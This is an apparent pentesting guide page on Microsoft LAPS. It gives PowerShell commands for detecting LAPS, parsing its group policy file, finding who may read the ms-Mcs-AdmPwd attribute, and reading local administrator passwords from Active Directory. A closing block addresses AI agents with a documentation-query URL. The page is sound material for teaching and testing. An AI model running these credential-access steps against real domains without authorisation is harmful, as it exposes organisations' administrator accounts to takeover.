# LAPS ## Introduction Local Administrator Password Solution (LAPS) is a Microsoft tool that helps organizations secure their local administrator accounts on Windows-based computers. It provides a unique, randomly generated password for each local administrator account on every managed computer in an organization's network, and stores the password securely in Active Directory. ## Enumeration There are three main ways to check if LAPS is enabled on the machine you have access to. * Check if the `AdmPwd.dll` exists on the system. ```bash dir C:\Program Files\LAPS\CSE ``` * Check for GPOs related to "LAPS". ```powershell Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl ``` * Check if the object `ms-Mcs-AdmPwdExpirationTime` is not null. ```powershell Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName ``` ## Exploitation 1\. Download the `Registry.pol,` which location is at the `gpcfilesyspath` obtained while enumerating GPOs. ```powershell ls \Machine\Registry.pol ``` 2\. Parse the file with the following command from the [GPRegistryPolicyParser](https://github.com/PowerShell/GPRegistryPolicyParser). ```powershell Parse-PolFile .\Desktop\Registry.pol ``` After parsing the file, you can obtain the following information: * Password complexity is upper, lower and numbers. * Password length is 14. * Passwords are changed every 30 days. * The LAPS managed account name is LapsAdmin. * Password expiration protection is disabled. 3\. Then, it is time to find out who can read the LAPS password. (There are two alternatives). * Directly looking at the computer ADLS ```powershell # Obtain the SID Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier # Convert the SID ConvertFrom-SID ``` * Using the [LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit). > :information\_source:`Find-LAPSDelegatedGroups` will query each OU and find domain groups that have delegated read access. `Find-AdmPwdExtendedRights` goes a little deeper and queries each individual computer for users that have "All Extended Rights". This will reveal any users that can read the attribute without having had it specifically delegated to them. ```powershell . .\LAPSToolkit.ps1 Find-LAPSDelegatedGroups ``` 4\. Once you have the permissions to read the password, you can read it as follows. ```powershell Get-DomainComputer -Identity -Properties ms-Mcs-AdmPwd ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://the-pentesting-guide.marmeus.com/active-directory/laps.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.